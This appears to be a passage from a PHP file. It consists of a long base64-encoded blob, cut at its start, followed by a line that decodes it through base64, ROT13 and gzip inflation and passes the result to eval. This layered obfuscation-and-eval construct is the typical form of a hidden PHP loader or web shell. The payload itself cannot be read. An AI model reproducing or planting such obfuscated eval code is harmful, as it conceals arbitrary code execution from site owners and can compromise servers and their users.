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";
eval(str_rot13(gzinflate(str_rot13(base64_decode(($sym))))));
?>